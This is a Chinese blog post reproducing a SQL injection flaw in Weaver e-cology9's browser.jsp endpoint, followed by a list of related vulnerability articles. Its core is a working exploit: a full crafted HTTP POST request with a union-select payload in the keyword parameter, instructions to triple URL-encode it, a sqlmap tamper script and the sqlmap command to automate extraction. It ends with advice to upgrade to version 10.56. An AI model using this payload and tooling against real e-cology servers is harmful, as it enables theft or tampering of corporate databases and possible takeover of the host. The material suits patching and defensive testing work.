泛微e-cology9 browser.jsp SQL注入漏洞

最新推荐文章于 2024-07-29 13:15:41 发布
原创 最新推荐文章于 2024-07-29 13:15:41 发布 · 2k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透测试 #sql #安全

本文介绍了泛微e-cology9的browser.jsp存在的SQL注入漏洞,详细阐述了漏洞的成因、危害及复现步骤,包括如何构建数据包、使用sqlmap自动化注入。同时,提出了修复建议,即升级到10.56及以上版本,并提供了相关扩展知识链接。

泛微e-cology9 browser.jsp SQL注入漏洞

漏洞描述(介绍、成因)

泛微e-cology9中存在SQL注入漏洞,经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。

漏洞危害

恶意攻击者可能会利用SQL注入漏洞获取、篡改数据库数据,执行系统命令,甚至获取系统控制权限。

适用场景

泛微e-cology9 <= 10.55

漏洞复现过程(有条件的自行搭建环境)

1、构建数据包
POST /mobile/plugin/browser.jsp HTTP/1.1
Host: xxx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-N976N Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.3729.136 Mobile Safari/537.36 E-Mobile7/7.0.41.20201208 Language/zh Qiyuesuo/physicalSDK
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: xxx
Connection: close
Content-Length: 574

isDis=1&browserTypeId=269&keyword=a%' union select 1,'
2、对payload进行三次url编码

payload:[isDis=1&browserTypeId=269&keyword=a%’ union select 1,']

在这里插入图片描述

3、发送恶意数据包,尝试注入

在这里插入图片描述
payload:[isDis=1&browserTypeId=269&keyword=a%’ union select 1,(select ‘hello’)']

在这里插入图片描述

4、使用sqlmap进行自动化注入

keyword 处内容换成星号 *

在这里插入图片描述

编写tamper脚本,对payload进行三次编码

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST

def dependencies():
    pass

def encodeAllStrings(strings):
    return "".join("%{0:0>2}".format(format(ord(char), "x")) for char in strings)

def tamper(payload, **kwargs):
    """
    Replaces instances of <int> UNION with <int>e0UNION

    Requirement:
        * MySQL
        * MsSQL

    Notes:
        * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf

    >>> tamper('1 UNION ALL SELECT')
    '1e0UNION ALL SELECT'
    """
    if payload:
        payload = encodeAllStrings(encodeAllStrings(encodeAllStrings(payload)))


    return payload

sqlmap.py -r target.txt --level 5 --tamper=url3encode

在这里插入图片描述
在这里插入图片描述

修复建议

目前官方已发布安全补丁,建议受影响用户尽快升级至10.56及以上版本。

https://www.weaver.com.cn/cs/securityDownload.asp#

扩展知识(链接、文章)

参考链接

泛微e-cology9 browser.jsp SQL注入漏洞分析 (qq.com)

注:本文章仅作技术学习作用,一切实验皆在个人虚拟环境下进行!!!

漏洞复现】OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)
李同學的安全圈
05-10 3522
协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。新一代移动办公平台E-Cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件,实体签章的方式,OA E-Cology平台browser.jsp处存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限。
漏洞复现】OA E-Cology Browser SQL注入漏洞
晚风不及你
05-16 1028
OA E-Cology browser存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器。
注入补丁_重大漏洞E-cology OA系统SQL注入漏洞及解决方案
weixin_33586063的博客
01-03 2823
E-cology OA系统SQL注入漏洞cnvd 国家信息安全漏洞共享平台发布【漏洞预警】CNNVD关于E-cology OA系统SQL注入漏洞情况的通报一、漏洞介绍 E-cology OA系统是一套兼具企业信息门户、知识管理、数据中心、工作流管理、人力资源管理、客户与合作伙伴管理、项目管理、财务管理、资产管理功能的协同商务平台。e-cology OA系统的WorkflowCent...
漏洞复现 OA E-Cology V9 browser.jsp SQL注入漏洞
qq_50854662的博客
03-20 8890
漏洞复现 OA E-Cology V9 browser.jsp SQL注入漏洞
e-cology9 SQL注入漏洞复现(QVD-2023-5012)
ZL_1618的博客
03-09 2834
协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。e-cology9中存在SQL注入漏洞,未经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。
【高危】 e-cology <10.57 存在 SQL注入漏洞(POC)(MPS-ndqt-0im5)
murphysec的博客
04-28 1702
协同管理应用平台(e-cology)是一套企业大型协同管理平台。 e-cology 受影响版本存在SQL注入漏洞,未经授权的远程攻击者可通过发送特殊的HTTP请求来获取数据库的敏感信息。
e-cology9 SQL注入漏洞复现【QVD-2023-5012】
holyxp的博客
07-22 988
协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。​ e-cology9中存在SQL注入漏洞,未经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。
CNVD-2023-12632 e-cology9 sql注入 附poc
三天不打上房揭瓦的博客
03-18 5873
由于e-cology9中对用户前台输入的数据未做校验,可以通过构造恶意的数据包导致SQL注入漏洞,进一步获取敏感数据。
漏洞复现】OA E-Cology SignatureDownLoad SQL注入漏洞
晚风不及你
05-15 865
OA E-Cology SignatureDownLoad存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器。
Jsp File Browser
01-12
国外著名的开源JSP文件管理器,历史悠久,功能强大,功能除了常用的建立文件夹,复制,删除文件等等之外,还包括在线浏览多种格式文件(JPG,FLASH,MP3...),在线编辑文本,单个或多文件下载为一个ZIP,调用服务器CMD,还提供丰富的配置参数.而所有这些只需一个JSP文件,功能实在强大,所以到现在还有很多国内的JSPer参考这个做成自己的JSP文件管理器,这里我也上传了供大家下载,官方地址是:http://www.vonloesch.de/jspbrowser.html可以下载原版,喜欢的可以到官方地址了解更多.支持开源但顺便鄙视到处改一下,而且还出错就说是自己做的人...
jspbrowser中文
01-07
jspBrowser中文乱码解决,多个地方编码设置
jsp File Browser中文版
11-18
修改于国外著名的开源JSP文件管理器,原版不支持中文,本人修改后支持:1、中文文件名、文件夹名的显示、修改、删除、创建;2、顶部添加主页、刷新功能链接;3、增加图片文件的预览功能(非IE浏览器需拖拽到新标签页预览)。 注:1、转载请注明本人原出处;2、如有任何疑问请联系本人QQ313783837(添加请注明jspFileBrowser中文版);3、喜欢原版的可以下载原版,官方地址是:http://www.vonloesch.de/jspbrowser.html
【高危】 e-cology9 存在任意用户登录漏洞
murphysec的博客
06-07 4058
墨菲安全是一家为您提供专业的软件供应链安全管理的科技公司,核心团队来自百度、华为、乌云等企业,公司为客户提供完整的软件供应链安全管理平台,围绕SBOM提供软件全生命周期的安全管理,平台能力包括软件成分分析、源安全管理、容器镜像检测、漏洞情报预警及商业软件供应链准入评估等多个产品。产品可以极低成本的和现有开发流程中的各种工具一键打通,包括 IDE、Gitlab、Bitbucket、Jenkins、Harbor、Nexus 等数十种工具无缝集成。将组件 e-cology9 升级至 10.57.2 及以上版本。
e-cology SQL注入漏洞复现
07-12 2504
此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!
E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现
huangyongkang666的博客
11-18 4197
E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现
漏洞复现】E-Cology9 WorkPlanService 前台SQL注入
最新发布
今天是几号的博客
07-29 3233
E-Cology9 中的 /services/WorkPlanService 接口存在SQL注入漏洞,攻击者可构造SOAP 请求进行SQL注入,窃取或修改数据库敏感信息,进一步利用可能获取目标系统权限。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
E-Cology WorkflowServiceXml SQL注入漏洞复现(QVD-2024-26136)
0xSec
07-12 2685
2024年7月,官方发布了新补丁,修复了一处SQL注入漏洞。经分析,攻击者无需认证即可利用该漏洞,建议受影响的客户尽快修复漏洞
OA e-cology9 存在 sql 注入
nnn2188185的博客
04-29 1741
信公众号搜索:南风漏洞复现文库该文章 南风漏洞复现文库 公众号首发 E-Cology9 协同办公系统是一套基于 JSPSQL Server 数据库的 OA 系统,包括知识文档管理、人力资源管理、客户关系管理、项目管理、财务管理、工作流程管理、数据中心等打造协同高效的企业管理环境,突破企业人、财、物、信息、流程等各种资源之间的屏障,并将集团各企业、企业各部门、各分支机构、以及企业与外部的供应商、分销商、客户及其他合作伙伴等整合在一个统一的平台上,使企业变成一个电子化的内外部协同工作的组织。
oa e-cology v9 browser.jsp sql注入漏洞
09-15
OA E-Cology V9是一款常用的企业办公自动化系统,该系统的browser.jsp页面存在SQL注入漏洞SQL注入是一种常见的网络攻击技术,攻击者可以通过构造恶意的SQL语句来绕过系统的认证和授权机制,进而获取敏感数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值